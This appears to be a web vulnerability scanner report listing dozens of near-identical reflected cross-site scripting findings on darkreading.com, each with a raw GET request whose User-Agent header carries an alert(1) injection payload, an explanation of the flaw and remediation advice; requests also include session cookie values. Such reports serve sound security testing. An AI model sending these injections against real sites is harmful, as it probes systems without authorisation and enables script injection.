GET /security HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)89bd7"-alert(1)-"08a9be8278b Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae88a"-alert(1)-"2a7e4850fd1 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/antivirus HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ae88a"-alert(1)-"2a7e4850fd1 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 473f8"-alert(1)-"5fcbd91432 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/application-security HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)473f8"-alert(1)-"5fcbd91432 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8eeb1"-alert(1)-"9124b85d0ed was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/208803634/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8eeb1"-alert(1)-"9124b85d0ed Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1575e"-alert(1)-"77c8a9d7d1f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/208803672/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)1575e"-alert(1)-"77c8a9d7d1f Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 53392"-alert(1)-"956fb230fca was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/220000718/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)53392"-alert(1)-"956fb230fca Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 950e7"-alert(1)-"497f3375e78 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222200174/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)950e7"-alert(1)-"497f3375e78 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f282e"-alert(1)-"52692c5d7b was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222300840/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f282e"-alert(1)-"52692c5d7b Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ae11"-alert(1)-"8ad807aef61 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222301436/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)8ae11"-alert(1)-"8ad807aef61 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c0c0f"-alert(1)-"b68b6e94a83 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222301500/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c0c0f"-alert(1)-"b68b6e94a83 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d8453"-alert(1)-"c082d70f6e4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222600139/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d8453"-alert(1)-"c082d70f6e4 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2ffa"-alert(1)-"f5a5634352f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222900286/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)a2ffa"-alert(1)-"f5a5634352f Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b98d"-alert(1)-"c7e78f5831 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/222900775/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)5b98d"-alert(1)-"c7e78f5831 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18f60"-alert(1)-"d3f3e81c0c0 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/223100233/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)18f60"-alert(1)-"d3f3e81c0c0 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3aac3"-alert(1)-"4d87bc548ff was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/223100436/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3aac3"-alert(1)-"4d87bc548ff Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fb53c"-alert(1)-"e84569fa5a4 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/223100902/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)fb53c"-alert(1)-"e84569fa5a4 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61a18"-alert(1)-"8f107851f0f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/223800139/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)61a18"-alert(1)-"8f107851f0f Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3fd2c"-alert(1)-"29fa8ae568e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/223800256/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)3fd2c"-alert(1)-"29fa8ae568e Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 481d7"-alert(1)-"196e4c1034a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224200523/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)481d7"-alert(1)-"196e4c1034a Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8d84"-alert(1)-"ca663d22ab8 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224201355/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)f8d84"-alert(1)-"ca663d22ab8 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 659a0"-alert(1)-"6c7aaa80bc7 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224500077/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)659a0"-alert(1)-"6c7aaa80bc7 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ec046"-alert(1)-"32d910e9b7c was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224600304/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)ec046"-alert(1)-"32d910e9b7c Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28f01"-alert(1)-"a8ae94a3c30 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224700541/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)28f01"-alert(1)-"a8ae94a3c30 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e804d"-alert(1)-"8b4d603cb19 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/224900081/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)e804d"-alert(1)-"8b4d603cb19 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f518"-alert(1)-"82062d11eec was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225200571/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)4f518"-alert(1)-"82062d11eec Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d91e6"-alert(1)-"98f2f4f92f3 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225600438/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)d91e6"-alert(1)-"98f2f4f92f3 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 19a27"-alert(1)-"8c7a8cabc3e was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225700088/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)19a27"-alert(1)-"8c7a8cabc3e Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9809c"-alert(1)-"b3bb2c41222 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /security/article/225701534/index.html HTTP/1.1 Host: www.darkreading.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)9809c"-alert(1)-"b3bb2c41222 Connection: close Cookie: PHPSESSID=3adngc99nmrc6ea6rohop0i2d0; iwa_user_login_check=M2FkbmdjOTlubXJjNmVhNnJvaG9wMGkyZDA%3D;
